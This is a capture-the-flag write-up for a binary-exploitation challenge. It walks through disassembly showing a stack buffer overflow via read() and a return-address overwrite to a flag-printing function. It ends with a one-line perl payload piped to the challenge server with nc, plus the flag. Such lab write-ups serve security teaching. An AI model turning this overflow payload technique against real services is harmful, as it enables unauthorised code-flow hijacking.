Points: 75

Tags: binary-exploitation 

Poll rating:

Sample Program Output:

What's your name?
Testing Name
It's dangerous to go alone! Take this, Testing Name

         █   
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
      ███████
      █ ███ █
        ███  
        ███  
        ███  


The program asks the user for a name, and then displays a message and a sword.

The message displayed is saved on the stack via manual movs:

  401210:   48 b8 49 74 27 73 20    movabs rax,0x6e61642073277449
  401217:   64 61 6e 
  40121a:   48 ba 67 65 72 6f 75    movabs rdx,0x742073756f726567
  401221:   73 20 74 
  401224:   48 89 85 f0 fd ff ff    mov    QWORD PTR [rbp-0x210],rax
  40122b:   48 89 95 f8 fd ff ff    mov    QWORD PTR [rbp-0x208],rdx
  401232:   48 b8 6f 20 67 6f 20    movabs rax,0x6f6c61206f67206f
  401239:   61 6c 6f 
  40123c:   48 ba 6e 65 21 20 54    movabs rdx,0x656b61542021656e
  401243:   61 6b 65 
  401246:   48 89 85 00 fe ff ff    mov    QWORD PTR [rbp-0x200],rax
  40124d:   48 89 95 08 fe ff ff    mov    QWORD PTR [rbp-0x1f8],rdx
  401254:   48 b8 20 74 68 69 73    movabs rax,0x202c7369687420
  40125b:   2c 20 00 
  40125e:   ba 00 00 00 00          mov    edx,0x0
  401263:   48 89 85 10 fe ff ff    mov    QWORD PTR [rbp-0x1f0],rax
  40126a:   48 89 95 18 fe ff ff    mov    QWORD PTR [rbp-0x1e8],rdx

And then tries to concatenate the user's name, asking for it via the read function:

  40129c:   48 8d 85 f0 fd ff ff    lea    rax,[rbp-0x210]
  4012a3:   48 89 c7                mov    rdi,rax
  4012a6:   e8 f5 fd ff ff          call   4010a0 <strlen@plt>
  4012ab:   48 8d 95 f0 fd ff ff    lea    rdx,[rbp-0x210]
  4012b2:   48 01 d0                add    rax,rdx
  4012b5:   ba 00 02 00 00          mov    edx,0x200
  4012ba:   48 89 c6                mov    rsi,rax
  4012bd:   bf 00 00 00 00          mov    edi,0x0
  4012c2:   e8 f9 fd ff ff          call   4010c0 <read@plt>

The problem is that the read function will put the values at the end of where the previous string ended up. This is rbp - 0x210 + strlen("It's dangerous...") The read function reads up to 0x200 bytes, so we can write outside this buffer and overwrite the return address.

There are no stack canaries nor ASLR, and right after the main function, there's a function that opens a file named flag.txt and prints it out:

  40130d: c3                    ret         
  40130e: f3 0f 1e fa           endbr64 
  401312: 55                    push   rbp 
  401313: 48 89 e5              mov    rbp,rsp
  401316: 48 81 ec 10 02 00 00  sub    rsp,0x210
  40131d: be 00 00 00 00        mov    esi,0x0
  401322: 48 8d 3d 16 0f 00 00  lea    rdi,[rip+0xf16]        # 40223f <open@plt+0x115f>
  401329: b8 00 00 00 00        mov    eax,0x0
  40132e: e8 ad fd ff ff        call   4010e0 <open@plt>
  401333: 89 45 fc              mov    DWORD PTR [rbp-0x4],eax
  401336: 48 8d 8d f0 fd ff ff  lea    rcx,[rbp-0x210]
  40133d: 8b 45 fc              mov    eax,DWORD PTR [rbp-0x4]
  401340: ba 00 02 00 00        mov    edx,0x200
  401345: 48 89 ce              mov    rsi,rcx
  401348: 89 c7                 mov    edi,eax
  40134a: e8 71 fd ff ff        call   4010c0 <read@plt>
  40134f: 8b 45 fc              mov    eax,DWORD PTR [rbp-0x4]
  401352: 89 c7                 mov    edi,eax
  401354: e8 57 fd ff ff        call   4010b0 <close@plt>
  401359: 48 8d 85 f0 fd ff ff  lea    rax,[rbp-0x210]
  401360: 48 89 c7              mov    rdi,rax
  401363: e8 28 fd ff ff        call   401090 <puts@plt>
  401368: 90                    nop
  401369: c9                    leave
  40136a: c3                    ret

So just changing the return address to 0x401313 works.

Solution: perl -e 'printf("a"x497 . "\x13\x13\x40" . "\x00"x10);' | nc jh2i.com 50011 flag{legend_of_zelda_overflow_of_time}

Writeups

ActionRatingAuthor team
Read writeup
not rated
Deadlock Team
Read writeup
not rated
burner_herz0g
Read writeup
2.0
Hack South
You need to authenticate and join a team to post writeups